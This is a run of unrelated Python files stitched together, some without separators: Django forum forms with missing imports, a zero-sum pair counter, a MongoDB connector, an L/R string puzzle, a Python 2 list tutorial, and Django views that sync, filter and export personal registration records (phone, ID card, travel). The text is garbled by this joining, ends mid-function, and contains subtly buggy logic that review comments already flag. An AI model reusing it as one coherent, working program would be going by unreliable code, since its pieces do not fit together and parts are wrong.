from django.template.defaultfilters import slugify
# Shared widget attrs: every required field is rendered with class="required".
# I put this on all required fields, because it's easier to pick up
# on them with CSS or JavaScript if they have a class of "required"
# in the HTML. Your mileage may vary. If/when Django ticket #3515
# lands in trunk, this will no longer be necessary.
attrs_dict = {'class': 'required'}
class RegistrationForm(forms.Form):
    """User registration form.

    Collects name, username, e-mail, password and terms-of-service consent.
    ``clean_email``/``clean_username`` enforce uniqueness (case-insensitive);
    rendering uses a crispy-forms horizontal layout built in ``__init__``.
    """
    last_name = forms.RegexField(regex=r'^[a-zA-Z]+$',
                                 max_length=20,
                                 widget=forms.TextInput(attrs=attrs_dict),
                                 label=_("Last name"),
                                 error_messages={'invalid': _(u"Only caracters are accepted.")})
    first_name = forms.RegexField(regex=r'^[a-zA-Z]+$',
                                  max_length=20,
                                  widget=forms.TextInput(attrs=attrs_dict),
                                  label=_("First name"),
                                  error_messages={'invalid': _(u"Only caracters are accepted.")})
    username = forms.RegexField(regex=r'^[a-zA-Z]+$',
                                max_length=30,
                                widget=forms.TextInput(attrs=attrs_dict),
                                label=_("Username"),
                                error_messages={'invalid': _(u"Only caracters are accepted.")})
    email = forms.EmailField(widget=forms.TextInput(attrs=dict(attrs_dict,
                                                               maxlength=75)),
                             label=_("E-mail"))
    password = forms.CharField(widget=forms.PasswordInput(attrs=attrs_dict, render_value=False),
                               min_length=8,
                               error_messages={'invalid': _(u"Minimum 8 caracters.")},
                               label=_("Password"))
    tos = forms.BooleanField(widget=forms.CheckboxInput(attrs=attrs_dict),
                             label=_(u"I agree to the Forum Terms of Service and Privacy Policy."),
                             error_messages={'required': _(u"You must accept Forum's Terms of Service and Privacy Policy")})

    def __init__(self, *args, **kwargs):
        # Build the crispy-forms layout before delegating to forms.Form.
        self.helper = FormHelper()
        self.helper.form_id = 'id_registration'
        self.helper.form_method = 'post'
        self.helper.form_action = '.'
        self.helper.form_class = "form-horizontal"
        self.helper.error_text_inline = True
        self.helper.layout = Layout(
            'username',
            'password',
            'email',
            'last_name',
            'first_name',
            'tos',
            FormActions(
                Submit('submit', 'Send', css_class="btn-primary"),
                HTML('<a class="btn" href="/">Cancel</a>')
            )
        )
        super(RegistrationForm, self).__init__(*args, **kwargs)

    def clean_email(self):
        """
        Validate that the supplied email address is unique for the
        site.
        """
        # Use .exists() (consistent with clean_username) instead of relying
        # on queryset truthiness, which evaluates the whole queryset.
        existing = User.objects.filter(email__iexact=self.cleaned_data['email'])
        if existing.exists():
            raise forms.ValidationError(_("This email address is already in use. Please supply a different email address."))
        return self.cleaned_data['email']

    def clean_username(self):
        """
        Validate that the username is not already in use
        (case-insensitive match).
        """
        existing = User.objects.filter(username__iexact=self.cleaned_data['username'])
        if existing.exists():
            raise forms.ValidationError(_("A user with that username already exists."))
        else:
            return self.cleaned_data['username']
class ThreadForm(forms.Form):
    """Form for creating a new thread together with its first post."""
    thread_title = forms.CharField(max_length=40,
                                   widget=forms.TextInput(attrs=attrs_dict),
                                   label=_("Thread title"))
    post_title = forms.CharField(max_length=40,
                                 widget=forms.TextInput(attrs=attrs_dict),
                                 label=_("Post Title"))
    post_description = forms.CharField(max_length=4000,
                                       widget=forms.Textarea(attrs=attrs_dict),
                                       label=_("Description"))
    def __init__(self, *args, **kwargs):
        # Build the crispy-forms layout before delegating to forms.Form.
        self.helper = FormHelper()
        self.helper.form_id = 'id_new_thread'
        self.helper.form_method = 'post'
        self.helper.form_action = '.'
        self.helper.form_class = "form-horizontal"
        self.helper.error_text_inline = True
        self.helper.layout = Layout(
            'thread_title',
            'post_title',
            'post_description',
            FormActions(
                Submit('submit', 'Send', css_class="btn-primary"),
                HTML('<a class="btn" href="/">Cancel</a>')
            )
        )
        super(ThreadForm, self).__init__(*args, **kwargs)
    def clean_thread_title(self):
        """
        Validate that no existing thread has the same slugified title.
        """
        existing = Thread.objects.filter(slug__iexact=slugify(self.cleaned_data['thread_title']))
        if existing.exists():
            raise forms.ValidationError(_("Thread already exist."))
        else:
            return self.cleaned_data['thread_title']
class PostForm(forms.Form):
    """Form for adding a reply post to an existing thread."""
    # NOTE(review): both hidden fields carry a hard-coded default value of
    # '2' -- presumably overwritten by the template/JavaScript; confirm.
    post_id = forms.CharField(widget=forms.HiddenInput(attrs={'value':'2'}))
    thread_nom = forms.CharField(widget=forms.HiddenInput(attrs={'value':'2'}))
    post_description = forms.CharField(max_length=4000,
                                       widget=forms.Textarea(attrs=attrs_dict),
                                       label=_("Post"))
    def __init__(self, *args, **kwargs):
        # Inline crispy-forms layout for the reply box.
        self.helper = FormHelper()
        self.helper.form_id = ''
        self.helper.form_method = 'post'
        self.helper.form_action = '.'
        self.helper.form_class = "form-inline"
        self.helper.error_text_inline = True
        self.helper.layout = Layout('post_description','post_id','thread_nom',
            FormActions(
                Submit("btn-add-post", "Add Post", css_class="btn-primary")
            )
        )
        super(PostForm, self).__init__(*args, **kwargs)
|
from sys import stdin
def pairSum0(l, n):
    """Count index pairs (i, j), i < j, with l[i] + l[j] == 0.

    Builds a frequency map in one pass, then pairs every value with its
    negation; both buckets are zeroed after being counted so the mirrored
    key contributes nothing when its turn comes.
    """
    freq = {}
    for value in l:
        freq[value] = freq.get(value, 0) + 1
    pairs = 0
    for value in freq:
        count = freq[value]
        if value == 0:
            # Zeros pair among themselves: C(count, 2).
            pairs += count * (count - 1) // 2
        elif -value in freq:
            pairs += count * freq[-value]
            # Consume both buckets to avoid double counting.
            freq[value] = 0
            freq[-value] = 0
    return pairs
def takeInput():
    """Read n, then n space-separated ints, from stdin; return (arr, n).

    Returns an empty list and 0 without consuming a second line when n is 0.
    """
    #To take fast I/O
    n=int(stdin.readline().strip())
    if n==0:
        return list(),0
    arr=list(map(int,stdin.readline().strip().split( )))
    return arr,n
# Script entry: read the array and print the number of zero-sum pairs.
arr,n=takeInput()
print(pairSum0(arr,n))
|
from pprint import pprint
from pymongo import MongoClient
from urllib.parse import quote_plus
import datetime
# True when this module is imported as part of the package (relative imports
# available); False when run directly or imported as plain "db".
isinpackage = not __name__ in ['db', '__main__']
if isinpackage:
    from .log import log
    from .settings import settings
else:
    from settings import settings
    # Minimal stand-in for the package logger when running standalone.
    def log(module, msg):
        print(module, msg)
# Module-level handle to the "kyukou" database; set by init().
db = None
def init(url):
    """Connect to MongoDB and bind the module-level ``db`` handle.

    :arg url: connection URL; may contain ``{username}``/``{password}``
        placeholders which are filled (percent-quoted) from settings when
        mongod credentials are configured.

    Logs the collection sizes as a startup sanity check.
    """
    if settings.mongod():
        url_ = url.replace("{username}", quote_plus(settings.mongod.username())).replace("{password}", quote_plus(settings.mongod.password()))
    else:
        url_ = url
    client = MongoClient(url_)
    global db
    db = client.kyukou
    # Log the template URL (not url_) so credentials never reach the log.
    log(__name__, f'Connected to DB: "{url}"')
    log(__name__, '-'*50)
    # count_documents() asks the server for the count instead of pulling every
    # document over the wire as len(list(find({}))) did.
    log(__name__, f'Number of Users : {get_collection("users").count_documents({})}')
    log(__name__, f'Number of Lectures: {get_collection("lectures").count_documents({})}')
    log(__name__, f'Number of Syllabus: {get_collection("syllabus").count_documents({})}')
    log(__name__, f'Number of Queue : {get_collection("queue").count_documents({})}')
    log(__name__, '-'*50)
def get_collection(name):
    """Return the named collection from the module-level database handle."""
    return db[name]
# When run standalone (not as a package), connect immediately using the
# configured URL.
if not isinpackage:
    from settings import settings
    init(settings.mongo_url())
__all__ = ["init", "get_collection"]
|
# Reads a string containing 'L'/'R' characters and fills `res` with per-
# position counts derived from each segment ending in an 'L'.
# NOTE(review): the problem statement is not recorded here; the logic splits
# (index-begin+1) between the last two positions of each segment, which looks
# like a domino/force-propagation style puzzle -- confirm before modifying.
s=input()
res=[0]*len(s)
begin=0
s=list(s)
n=len(s)
index=0
while begin<n:
    # Position of the next 'L' at or after `begin`; raises ValueError if the
    # remaining suffix contains no 'L' (input is assumed to guarantee one).
    index=begin+s[begin:].index('L')
    if index!=len(s)-1 and s[index+1]=='R':
        # 'L' immediately followed by 'R': split the segment length evenly
        # (even case) or weight the 'L' end (odd case).
        if (index-begin+1)%2==0:
            res[index]=(index-begin+1)//2
            res[index-1]=(index-begin+1)//2
        else:
            res[index]=index-begin
            res[index-1]=index-begin-1
    elif index==len(s)-1:
        # 'L' is the final character: distribute and stop.
        if (index-begin+1)%2==0:
            res[index]=(index-begin+1)//2
            res[index-1]=(index-begin+1)//2
        else:
            res[index]=(index-begin+1)//2+1
            res[index-1]=(index-begin+1)//2
        break
    elif index!=len(s)-1 and s[index+1]=='L':
        if 'R' in s[index+1:]:
            # NOTE(review): `tmp` is an index into the slice s[index+1:] but
            # is used below (tmp-index-1, index=tmp-1) as if it were an
            # absolute index into s -- this looks off by index+1; verify.
            tmp=s[index+1:].index('R')
            res[index]+=tmp-index-1
            if (index-begin+1)%2==0:
                res[index]+=(index-begin+1)//2
                res[index-1]+=(index-begin+1)//2
            else:
                res[index]+=index-begin
                res[index-1]+=index-begin-1
            index=tmp-1
        else:
            # No 'R' remains: everything to the right of this 'L' counts.
            res[index]+=n-index-1
            if (index-begin+1)%2==0:
                res[index]+=(index-begin+1)//2
                res[index-1]+=(index-begin+1)//2
            else:
                res[index]+=index-begin
                res[index-1]+=index-begin-1
            break
    begin=index+1
# Emit the counts space-separated on one line.
for i in res:
    print(i,end=' ')
# coding=utf-8
# NOTE(review): this file is Python 2 only -- the bare `print json.dumps(...)`
# statement and json.dumps(encoding=...) below do not exist in Python 3.
import json
# Lists: comparable to Java's arrays.
# Most common usage: store items of the same type, iterate over them, and
# run the same operation on every element inside the loop body.
name_list = ["zhangsan", "lisi", "wangwu"]
print (name_list)
# Index into the list to fetch an item; indices start at 0.
print (name_list[1])
# 1. Reading values and looking up indices -- stay inside the index range.
print (name_list[0])
# Look up the index of a value; raises an error if it is not in the list.
print (name_list.index("lisi"))
# 2. Replace an element in place.
name_list[1] = "wangermazi"
# 3. append() adds an item at the end of the list.
name_list.append("wangxiaoer")
# 3.1 insert() places an item at the given index.
name_list.insert(1, "张三")
print json.dumps(name_list, encoding="UTF-8", ensure_ascii=False, sort_keys=False, indent=4)
# 4. Removing elements.
# remove() deletes the first occurrence of the given value.
name_list.remove("张三")
# pop() removes the last element, or the one at the given index.
name_list.pop()
name_list.pop(0)
# (list.clear() does not exist in Python 2.7.)
# 5. The del keyword also deletes the element at an index.
del name_list[1]
# del fundamentally removes a name (variable) from memory.
nam = "小明"
del nam
# Note: once del has removed a variable,
# later code can no longer use that name.
# 6. count() tallies how many times a value occurs in the list.
count = name_list.count("张三")
print ("张三出现了%d次" % count)
# 7. sort(): ascending by default...
name_list.sort()
# ...or descending with reverse=True.
name_list.sort(reverse=True)
# 8. Iterate the list with a for loop.
for my_name in name_list:
    print ("我的名字叫%s" % my_name)
import os
import time, datetime
import xlrd
from django.http import HttpResponse, JsonResponse
from django.shortcuts import render
from django.utils.http import urlquote
from django.views.decorators.csrf import csrf_protect
from django.core.paginator import Paginator
from yqry import settings
from .models import yqdx_fyz, yqdx_zzq_provinces, yqdx_zzq_city
import xlsxwriter
from django.http import FileResponse
from .query_helupingtai import *
from django.db.models import Count
# Create your views here.
###################返甬人员组######################################
def get_progress_message(request):
    """Return the current sync/import progress message, timestamped.

    Polled by the front end while a long-running job (see tongbu) updates
    request.session['progress_message'].
    """
    dt = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
    if not request.session.get('progress_message'):
        return HttpResponse(dt + ':session初始化')
    else:
        return HttpResponse(dt + ':' + request.session.get('progress_message'))
def dx_import_fyz(request):
    """Render the fyz (returning-personnel group) import page."""
    return render(request, "import_fyz.html")
def tongbu(request):
    """Synchronize declaration records from the remote platform into yqdx_fyz.

    Pages through import_data(session_id, page) until an empty page comes
    back, bulk-inserting records whose uuid is not yet present, and reports
    progress via the session for the polling front end.

    Fix: the identifying fields referenced by the except handler are now
    pre-bound, so a failure before the first record is parsed can no longer
    raise NameError inside the handler itself.
    """
    session_id = request.POST.get('session_id')
    request.session['progress_message'] = '读取中...'
    request.session.save()
    request.session.set_expiry(0)  # session expires when the browser closes
    succ_count = 0
    error_list = []
    # Pre-bind fields used in the error message below (see docstring).
    phone = userName = idCard = ''
    i = 1
    back_dic = import_data(session_id, i)
    if back_dic['code'] == 305:
        return JsonResponse({"code": 305, "msg": "cookie值无效,请重新输入!", "error": "cookie值无效,请重新输入!"})
    elif back_dic['code'] == 200 and back_dic['count'] > 0:
        try:
            while True:
                insert_dic_list = list()
                for dic in back_dic['dic_list']:
                    uuid = dic['uuid']
                    userName = dic['userName']
                    phone = dic['phone']
                    idCard = dic['idCard']
                    liveAddress = dic['liveAddress']
                    workAddress = dic['workAddress']
                    carNo = dic['carNo']
                    carType = dic['carType']
                    startAddress_provinces, startAddress_city, startAddress_county = dic['startAddress'].split(' ')
                    endAddress_city, endAddress_county, endAddress_town = dic['endAddress'].split(' ')
                    endArea = dic['endArea']
                    kakou = dic['kakou']
                    whyGo = dic['whyGo']
                    createTime = dic['createTime']
                    # Skip records already imported; uuid is the natural key.
                    if not yqdx_fyz.objects.filter(uuid=uuid).exists():
                        insert_dic_list.append(yqdx_fyz(uuid=uuid, userName=userName, phone=phone, idCard=idCard,
                                                        liveAddress=liveAddress, workAddress=workAddress, carNo=carNo,
                                                        carType=carType, startAddress_provinces=startAddress_provinces,
                                                        startAddress_city=startAddress_city,
                                                        startAddress_county=startAddress_county,
                                                        endAddress_city=endAddress_city,
                                                        endAddress_county=endAddress_county,
                                                        endAddress_town=endAddress_town,
                                                        endArea=endArea, kakou=kakou, whyGo=whyGo,
                                                        createTime=createTime,
                                                        createDate=createTime.split(' ')[0]))
                        succ_count += 1
                yqdx_fyz.objects.bulk_create(insert_dic_list)
                request.session['progress_message'] = '已完成同步第{0}页'.format(i)
                request.session.save()
                i += 1
                back_dic = import_data(session_id, i)
                if back_dic['count'] == 0:
                    break
        except Exception as e:
            # Best effort: record which row broke, then stop syncing.
            error_list.append('手机:{0},姓名:{1},身份证号:{2},错误:{3}'.format(phone, userName, idCard, repr(e)))
    request.session['progress_message'] = '同步完成'
    request.session.save()
    return JsonResponse({"code": 200, "msg": "同步成功,新增{0}条!".format(succ_count), "error": error_list})
def yqdx_list_fyz(request):
    """Paginated, filterable list view of the yqdx_fyz registrations.

    Filter values arrive via POST; page/size come from the query string.
    Any active filter resets the pager to page 1.  Distinct value lists feed
    the template's filter drop-downs.

    Fix: the search_cache dict carried the key 'startAddress_city' twice;
    the duplicate entry is removed.
    """
    # Filter values from the search form.
    phone_no = request.POST.get('phone_no')
    name = request.POST.get('name')
    sfzh = request.POST.get('sfzh')
    carType = request.POST.get('carType')
    startAddress_provinces = request.POST.get('startAddress_provinces')
    startAddress_city = request.POST.get('startAddress_city')
    endAddress_town = request.POST.get('endAddress_town')
    createDate = request.POST.get('createDate')
    now_page = request.GET['page']
    size = request.GET['size']
    data_list = yqdx_fyz.objects.order_by('-createTime')
    if (phone_no is not None) and (phone_no != ''):
        data_list = data_list.filter(phone=phone_no)
        now_page = '1'
    if (name is not None) and (name != ''):
        data_list = data_list.filter(userName__contains=name)
        now_page = '1'
    if (sfzh is not None) and (sfzh != ''):
        data_list = data_list.filter(idCard__contains=sfzh)
        now_page = '1'
    if (carType is not None) and (carType != '全部'):
        data_list = data_list.filter(carType=carType)
        now_page = '1'
    if (startAddress_provinces is not None) and (startAddress_provinces != '全部'):
        data_list = data_list.filter(startAddress_provinces=startAddress_provinces)
        now_page = '1'
    if (startAddress_city is not None) and (startAddress_city != '全部'):
        data_list = data_list.filter(startAddress_city=startAddress_city)
        now_page = '1'
    if (endAddress_town is not None) and (endAddress_town != '全部'):
        data_list = data_list.filter(endAddress_town=endAddress_town)
        now_page = '1'
    if (createDate is not None) and (createDate != '全部'):
        data_list = data_list.filter(createDate=createDate)
        now_page = '1'
    # Echo the active filters back to the template.
    search_cache = {'phone_no': phone_no, 'name': name, 'sfzh': sfzh, 'carType': carType,
                    'startAddress_provinces': startAddress_provinces, 'startAddress_city': startAddress_city,
                    'endAddress_town': endAddress_town,
                    'createDate': createDate}
    if data_list.exists():
        # Pagination.
        paginator = Paginator(data_list, size)
        total_page = paginator.num_pages
        total_count = paginator.count
        back_page = paginator.page(now_page)
        has_pre = back_page.has_previous()
        has_next = back_page.has_next()
        next_num = total_page
        pre_num = 1
        if has_next:
            next_num = back_page.next_page_number()
        if has_pre:
            pre_num = back_page.previous_page_number()
        # Distinct value lists for the filter drop-downs.
        carType_list = yqdx_fyz.objects.values('carType').distinct()
        startAddress_provinces_list = yqdx_fyz.objects.values('startAddress_provinces').distinct()
        startAddress_city_list = yqdx_fyz.objects.values('startAddress_city').distinct()
        endAddress_town_list = yqdx_fyz.objects.values('endAddress_town').distinct()
        createDate_list = yqdx_fyz.objects.values('createDate').distinct().order_by('createDate')
        return render(request, 'yqdx_list_fyz.html',
                      {'back_page': back_page, 'now_page': now_page, 'size': size, 'total_page': total_page,
                       'next_num': next_num,
                       'pre_num': pre_num, 'has_pre': has_pre, 'has_next': has_next,
                       'carType_list': carType_list, 'startAddress_provinces_list': startAddress_provinces_list,
                       'startAddress_city_list': startAddress_city_list, 'endAddress_town_list': endAddress_town_list,
                       'search_cache': search_cache, 'createDate_list': createDate_list,
                       'total_count': total_count})
    else:
        return HttpResponse(
            "库里无数据,请先批量导入或修改查询条件<br><a href='/'>首页</a><br><a href='/yqdx_list_fyz?page=1&size=100'>返回列表</a>")
def yqdx_list_export_fyz(request):
    """Export the (filtered) yqdx_fyz records to an Excel workbook.

    Applies the same filters as the list view, writes all matching rows to
    media/export/<timestamp>.xls and returns the file name as JSON so the
    front end can trigger the download.
    """
    phone_no = request.POST.get('phone_no')
    name = request.POST.get('name')
    sfzh = request.POST.get('sfzh')
    carType = request.POST.get('carType')
    startAddress_provinces = request.POST.get('startAddress_provinces')
    startAddress_city = request.POST.get('startAddress_city')
    endAddress_town = request.POST.get('endAddress_town')
    createTime = request.POST.get('createTime')
    # Timestamp string used as a unique file name.
    timestr = str(time.time()).replace('.', '')
    data_list_tmp = yqdx_fyz.objects.all()
    if (phone_no is not None) and (phone_no != ''):
        data_list_tmp = data_list_tmp.filter(phone=phone_no)
    if (name is not None) and (name != ''):
        data_list_tmp = data_list_tmp.filter(userName__contains=name)
    if (sfzh is not None) and (sfzh != ''):
        data_list_tmp = data_list_tmp.filter(idCard__contains=sfzh)
    if (carType is not None) and (carType != '全部'):
        data_list_tmp = data_list_tmp.filter(carType=carType)
    if (startAddress_provinces is not None) and (startAddress_provinces != '全部'):
        data_list_tmp = data_list_tmp.filter(startAddress_provinces=startAddress_provinces)
    if (startAddress_city is not None) and (startAddress_city != '全部'):
        data_list_tmp = data_list_tmp.filter(startAddress_city=startAddress_city)
    if (endAddress_town is not None) and (endAddress_town != '全部'):
        data_list_tmp = data_list_tmp.filter(endAddress_town=endAddress_town)
    # NOTE(review): this filters on the exact createTime datetime while the
    # list view filters on createDate -- likely meant to be createDate;
    # confirm against the posting template.
    if (createTime is not None) and (createTime != '全部'):
        data_list_tmp = data_list_tmp.filter(createTime=createTime)
    # Create the export workbook.
    # NOTE(review): xlsxwriter emits xlsx-format data despite the .xls name.
    result_path = os.path.join(settings.BASE_DIR + settings.MEDIA_URL, 'export/', '{0}.xls'.format(timestr))
    export_xls = xlsxwriter.Workbook(result_path)  # new workbook
    export_sheet = export_xls.add_worksheet('返甬预登记库查询导出')
    # Header row.
    export_sheet.write_row(0, 0, ['手机号', '姓名', '身份证号', '现住地址', '工作地址', '车牌/次号', '交通工具',
                                  '来自省', '来自市', '来自县', '返回市', '返回区', '返回镇', '返回详址', '卡口', '返回理由', '登记日期', '数据来源'])
    row_num = 1
    for for_tmp in data_list_tmp:
        query_set_list = [for_tmp.phone, for_tmp.userName, for_tmp.idCard, for_tmp.liveAddress, for_tmp.workAddress,
                          for_tmp.carNo,
                          for_tmp.carType, for_tmp.startAddress_provinces, for_tmp.startAddress_city,
                          for_tmp.startAddress_county, for_tmp.endAddress_city,
                          for_tmp.endAddress_county, for_tmp.endAddress_town, for_tmp.endArea, for_tmp.kakou,
                          for_tmp.whyGo,
                          for_tmp.createTime.strftime('%Y-%m-%d %H:%M'), for_tmp.from_source, ]
        export_sheet.write_row(row_num, 0, query_set_list)
        row_num += 1
    # All rows buffered; close() writes the workbook to disk.
    export_xls.close()
    result = {"field": "export", "filename": timestr + '.xls'}
    return JsonResponse(result)
def jjbd_fyz(request):
    """Render the Excel comparison ("jjbd") upload page."""
    return render(request, "jjbd_fyz.html")
def jjbd_upload_fyz(request):
    """Compare an uploaded Excel sheet against the yqdx_fyz table.

    Each row is matched by phone (bd_type '1'), id card ('2') or phone+name
    ('3'); matched rows go to the "same" sheet of the result workbook and
    the rest to the "different" sheet, which is streamed back as a download.
    """
    excel = request.FILES.get('excel')
    bd_type = request.POST.get('bd_type')
    # File extension of the upload (lower-cased).
    file_type = excel.name.rsplit('.')[-1]
    file_type = file_type.lower()
    # Timestamp string used as a unique file name.
    timestr = str(time.time()).replace('.', '')
    # Path the uploaded workbook is written to.
    path = os.path.join(settings.BASE_DIR + settings.MEDIA_URL, '{0}.{1}'.format(timestr, file_type))
    # Write the upload in chunks (efficient for files over ~2.5MB).
    f = open(path, 'wb+')
    for chunk in excel.chunks():
        f.write(chunk)
    f.close()
    # Result workbook for the comparison.
    # NOTE(review): xlsxwriter emits xlsx-format data despite the .xls name.
    result_path = os.path.join(settings.BASE_DIR + settings.MEDIA_URL, 'jjbd/', '{0}.xls'.format(timestr))
    jjbd_result_xls = xlsxwriter.Workbook(result_path)  # new workbook
    same_sheet = jjbd_result_xls.add_worksheet('相同结果集')
    different_sheet = jjbd_result_xls.add_worksheet('不同结果集')
    same_sheet_row_num = 0
    different_sheet_row_num = 0
    # Read the uploaded template back with xlrd.
    book = xlrd.open_workbook(path)
    sheet1 = book.sheets()[0]
    row_num = sheet1.nrows
    for n in range(0, row_num):
        cell_0_value = sheet1.cell_value(n, 0)
        # ctype 2 is a number cell; normalize numbers to integer strings.
        if sheet1.cell(n, 0).ctype == 2:
            cell_0_value = str(int(cell_0_value))
        cell_0_value = cell_0_value.strip()
        cell_1_value = sheet1.cell_value(n, 1)
        if sheet1.cell(n, 1).ctype == 2:
            cell_1_value = str(int(cell_1_value))
        cell_1_value = cell_1_value.strip()
        kwargs = {
            # dynamically-built filter fields
        }
        if bd_type == '1' and cell_0_value != '':  # phone number
            kwargs['phone'] = cell_0_value
        elif bd_type == '2' and cell_0_value != '':  # id-card number
            kwargs['idCard'] = cell_0_value
        elif bd_type == '3' and cell_1_value != '':  # phone in col 1, name in col 2
            kwargs['phone'] = cell_0_value
            kwargs['userName'] = cell_1_value
        elif bd_type == '4':
            pass
        if kwargs and yqdx_fyz.objects.filter(**kwargs).exists():
            same_sheet.write_row(same_sheet_row_num, 0, sheet1.row_values(n))
            same_sheet_row_num += 1
        else:
            different_sheet.write_row(different_sheet_row_num, 0, sheet1.row_values(n))
            different_sheet_row_num += 1
    jjbd_result_xls.close()
    # FileResponse closes file_tmp when the response is consumed.
    file_tmp = open(result_path, 'rb')
    response = FileResponse(file_tmp)
    response['Content-Type'] = 'application/vnd.ms-excel'
    response['Content-Disposition'] = 'attachment;filename=' + urlquote(
        '比对结果' + timestr + '.xls')  # downloaded file name
    return response
def bddc_fyz(request):
    """Render the in-table comparison/export ("bddc") upload page."""
    return render(request, "bddc_fyz.html")
def bddc_upload_fyz(request):
    """Look up each row of an uploaded Excel sheet in yqdx_fyz and export.

    Matched registrations are written out in full to one sheet, unmatched
    input rows to another, and the workbook is returned as a download.
    """
    excel = request.FILES.get('excel')
    bd_type = request.POST.get('bd_type')
    # File extension of the upload (lower-cased).
    file_type = excel.name.rsplit('.')[-1]
    file_type = file_type.lower()
    # Timestamp string used as a unique file name.
    timestr = str(time.time()).replace('.', '')
    file_name = '{0}.{1}'.format(timestr, file_type)
    # Path the uploaded workbook is written to.
    path = os.path.join(settings.BASE_DIR + settings.MEDIA_URL, file_name)
    f = open(path, 'wb+')
    # Write the upload in chunks (efficient for files over ~2.5MB).
    for chunk in excel.chunks():
        f.write(chunk)
    f.close()
    # Result workbook for the comparison.
    result_path = os.path.join(settings.BASE_DIR + settings.MEDIA_URL, 'bddc/', '{0}.xls'.format(timestr))
    bddc_result_xls = xlsxwriter.Workbook(result_path)  # new workbook
    same_sheet = bddc_result_xls.add_worksheet('镇海库中有对象导出')
    different_sheet = bddc_result_xls.add_worksheet('库中无')
    # Header row.
    same_sheet.write_row(0, 0, ['手机号', '姓名', '身份证号', '现住地址', '工作地址', '车牌/次号', '交通工具',
                                '来自省', '来自市', '来自县', '返回市', '返回区', '返回镇', '返回详址', '卡口', '返回理由', '登记日期', '数据来源'])
    same_sheet_row_num = 1
    different_sheet_row_num = 0
    # Read the uploaded template back with xlrd.
    book = xlrd.open_workbook(path)
    sheet1 = book.sheets()[0]
    row_num = sheet1.nrows
    for n in range(0, row_num):
        cell_0_value = sheet1.cell_value(n, 0)
        # ctype 2 is a number cell; normalize numbers to integer strings.
        if sheet1.cell(n, 0).ctype == 2:
            cell_0_value = str(int(cell_0_value))
        cell_0_value = cell_0_value.strip()
        cell_1_value = sheet1.cell_value(n, 1)
        if sheet1.cell(n, 1).ctype == 2:
            cell_1_value = str(int(cell_1_value))
        cell_1_value = cell_1_value.strip()
        kwargs = {}  # dynamically-built filter fields
        if bd_type == '1' and cell_0_value != '':  # phone number
            kwargs['phone'] = cell_0_value
        elif bd_type == '2' and cell_0_value != '':  # id-card number
            kwargs['idCard'] = cell_0_value
        elif bd_type == '3' and cell_1_value != '':  # phone in col 1, name in col 2
            kwargs['phone'] = cell_0_value
            kwargs['userName'] = cell_1_value
        elif bd_type == '4':
            pass
        # Apply the filter.
        queryset_tmp = yqdx_fyz.objects.filter(**kwargs)
        if kwargs and queryset_tmp.exists():
            queryset = queryset_tmp.first()
            query_set_list = [queryset.phone, queryset.userName, queryset.idCard, queryset.liveAddress,
                              queryset.workAddress, queryset.carNo,
                              queryset.carType, queryset.startAddress_provinces, queryset.startAddress_city,
                              queryset.startAddress_county, queryset.endAddress_city,
                              queryset.endAddress_county, queryset.endAddress_town, queryset.endArea, queryset.kakou,
                              queryset.whyGo,
                              queryset.createTime.strftime('%Y-%m-%d %H:%M'), queryset.from_source, ]
            same_sheet.write_row(same_sheet_row_num, 0, query_set_list)
            same_sheet_row_num += 1
        else:
            different_sheet.write_row(different_sheet_row_num, 0, sheet1.row_values(n))
            different_sheet_row_num += 1
    bddc_result_xls.close()
    # FileResponse closes file_tmp when the response is consumed.
    file_tmp = open(result_path, 'rb')
    response = FileResponse(file_tmp)
    response['Content-Type'] = 'application/vnd.ms-excel'
    response['Content-Disposition'] = 'attachment;filename=' + urlquote(
        '库中比对导出结果' + timestr + '.xls')  # downloaded file name
    return response
def zzq_fyz_manager(request):
    """Render the heavily-affected-region management page.

    Shows the currently configured provinces/cities plus all distinct
    origin provinces/cities present in the registration data.
    """
    zzq_provinces_list = yqdx_zzq_provinces.objects.all()
    zzq_city_list = yqdx_zzq_city.objects.all()
    startAddress_provinces_list = yqdx_fyz.objects.all().values('startAddress_provinces').distinct()
    startAddress_city_list = yqdx_fyz.objects.all().values('startAddress_city').distinct()
    context = {"zzq_provinces_list": zzq_provinces_list, "zzq_city_list": zzq_city_list,
               "startAddress_provinces_list": startAddress_provinces_list,
               "startAddress_city_list": startAddress_city_list}
    return render(request, "zzq_fyz.html", context)
def zzq_fyz_db(request):
    """Replace the stored disaster-area provinces and cities with the POSTed lists."""
    new_provinces = [yqdx_zzq_provinces(startAddress_provinces=p)
                     for p in request.POST.getlist('zzq_provinces_list')]
    new_cities = [yqdx_zzq_city(startAddress_city=c)
                  for c in request.POST.getlist('zzq_city_list')]
    # Wipe the current configuration before bulk-inserting the new one.
    yqdx_zzq_provinces.objects.all().delete()
    yqdx_zzq_city.objects.all().delete()
    yqdx_zzq_city.objects.bulk_create(new_cities)
    yqdx_zzq_provinces.objects.bulk_create(new_provinces)
    return HttpResponse('修改成功<br><a href=\'/\'>返回首页</a><br><a href=\'/zzq_fyz\'>重灾区管理</a>')
def tongji_fyz(request):
    """Render the statistics page: last-7-day daily counts and day-over-day growth
    rates for the configured disaster-area provinces/cities plus a nationwide total.
    The per-series values are built as comma-joined strings for the front-end chart."""
    provinces_tongji_list = list()
    provinces_zengzhanglv_list = list()
    city_tongji_list = list()
    city_zengzhanglv_list = list()
    back_date = str()  # date labels handed to the front-end chart, e.g. "'02-01','02-02',"
    date_list = list()
    # Configured "disaster area" provinces and cities.
    zzq_provinces_list = [tmp[0] for tmp in yqdx_zzq_provinces.objects.all().values_list('startAddress_provinces')]
    zzq_city_list = [tmp[0] for tmp in yqdx_zzq_city.objects.all().values_list('startAddress_city')]
    back_provinces = '\'' + '\',\''.join(zzq_provinces_list) + '\''  # builds a string like 'A','B','C'
    back_city = '\'' + '\',\''.join(zzq_city_list) + '\''
    # Daily record counts grouped by province / city / nationwide (MySQL DATE_FORMAT).
    zzq_provinces_queryset = yqdx_fyz.objects.extra(
        select={"createDate": "DATE_FORMAT(createTime, '%%Y-%%m-%%d')"}).filter(
        startAddress_provinces__in=zzq_provinces_list).values('createDate', 'startAddress_provinces').annotate(
        num=Count('createDate')).order_by('createDate')
    zzq_city_queryset = yqdx_fyz.objects.extra(select={"createDate": "DATE_FORMAT(createTime, '%%Y-%%m-%%d')"}).filter(
        startAddress_city__in=zzq_city_list).values('createDate', 'startAddress_city').annotate(
        num=Count('createDate')).order_by('createDate')
    quanguo_queryset = yqdx_fyz.objects.extra(select={"createDate": "DATE_FORMAT(createTime, '%%Y-%%m-%%d')"}).values(
        'createDate').annotate(
        num=Count('createDate')).order_by('createDate')
